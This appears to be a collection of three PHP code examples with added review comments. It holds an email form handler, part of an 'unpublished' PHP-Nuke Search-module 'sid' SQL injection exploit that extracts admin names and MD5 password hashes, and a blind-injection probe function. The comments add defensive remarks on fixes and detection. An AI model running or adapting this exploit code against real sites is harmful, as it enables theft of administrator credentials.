Example #1
<?php 
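// NOTE(review): error_reporting(0) silences every PHP diagnostic for this request.
// It is kept so the page behaves as before; logging errors server-side with
// display_errors off gives the same clean output without losing the diagnostics.
error_reporting(0);

if (!isset($_POST['sendit'])) {
    // No submission marker in the request: render the empty form.
    email_form();
} else {
    $required = array('recipient', 'subject', 'message');
    foreach ($required as $val) {
        // A field posted as name[]=x arrives as an array, and array == '' is false,
        // so the former loose check accepted it. Require a non-empty string instead.
        if (!isset($_POST[$val]) || !is_string($_POST[$val]) || $_POST[$val] === '') {
            echo "<div class='error'>Error: You must fill out all the form fields</div>";
            email_form();
            footer();
            exit;
        }
    }
    // NOTE(review): sendit() is not shown in this excerpt. Confirm that it rejects
    // CR/LF in recipient and subject before they are used as mail headers.
    sendit();
}
footer();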
function email_form()
{
    $action = !isset($_SERVER['PHP_SELF']) ? 'email_test.php' : htmlentities($_SERVER['PHP_SELF']);
    $recipient = !isset($_POST['recipient']) ? '' : $_POST['recipient'];
    $subject = !isset($_POST['subject']) ? '' : $_POST['subject'];
    $message = !isset($_POST['message']) ? '' : $_POST['message'];
    ?>
	
		<form method="post" action="<?php 
    echo $action;
    ?>
">
		<input type="hidden" name="sendit" value="true" />
Example #2
<?php

##########################################################
# UNPUBLISHED RST/GHC EXPLOIT
# PHP Nuke `sid` sql injection exploit for Search module
# POST method -
# the best for version 8.0 FINAL
# (c)oded by Foster & 1dt.w0lf
##########################################################
# tested on 6.0 , 6.6 , 7.9 , 8.0 FINAL versions
##########################################################
// Runs only when the form carrying a 'Submit' field was posted.
if (isset($_POST['Submit'])) {
    // sendit() (defined below, cut off in this listing) is handed an SQL expression
    // that joins the aid and pwd columns between "::" delimiters.
    $result = sendit('CONCAT("::",aid,"::",pwd,"::")');

    // Group 1 is the name, group 2 a 32-character lowercase hex string, which has
    // the shape of an MD5 digest (presumably how the targeted versions store pwd).
    // Defensive note: per the header this abuses `sid` in the Search module; the
    // fix is a parameterized query there, and a "::<name>::<32 hex>::" token in a
    // search response is a usable marker for response-side detection.
    if (preg_match("/::([^:]*)::([a-f0-9]{32})::/", $result, $matches) === 1) {
        list(, $aname, $ahash) = $matches;
    }
}
function sendit($param)
{
    $prefix = $_POST['prefix'];
    $data = $_POST['sql_text'];
    $host = $_POST['hostname'];
    $page = isset($_POST['dir']) ? '/' . $_POST['dir'] : '';
    $page .= '/modules.php?name=Search';
    $method = $_POST['method'];
    $ref_text = $_POST['ref_text'];
    $user_agent = $_POST['user_agent'];
    $result = '';
    $sock = fsockopen($host, 80, $errno, $errstr, 50);
    if (!$sock) {
Example #3
/**
 * Issues one GET request through sendit() with the given cookie and reports
 * whether the value toPage() derives from the response is below the global
 * baseline $etalon.
 *
 * sendit() and toPage() are not part of this excerpt, so what toPage() measures
 * is not visible here (presumably a size or marker of the page; confirm).
 *
 * NOTE(review): a 1/0 answer taken from comparing a response against a baseline
 * looks like a boolean (blind) injection probe. On the server side that shows up
 * as many near-identical GET requests differing only in one cookie value, which
 * request logging and rate limiting can surface.
 *
 * @param mixed $sqlCookie Cookie value forwarded unchanged to sendit().
 * @return int 1 when the derived value is below $etalon, otherwise 0.
 */
function check($sqlCookie)
{
    global $page, $etalon;

    $response = sendit($page, 'GET', $sqlCookie);
    $measured = toPage($response);

    return $measured < $etalon ? 1 : 0;
}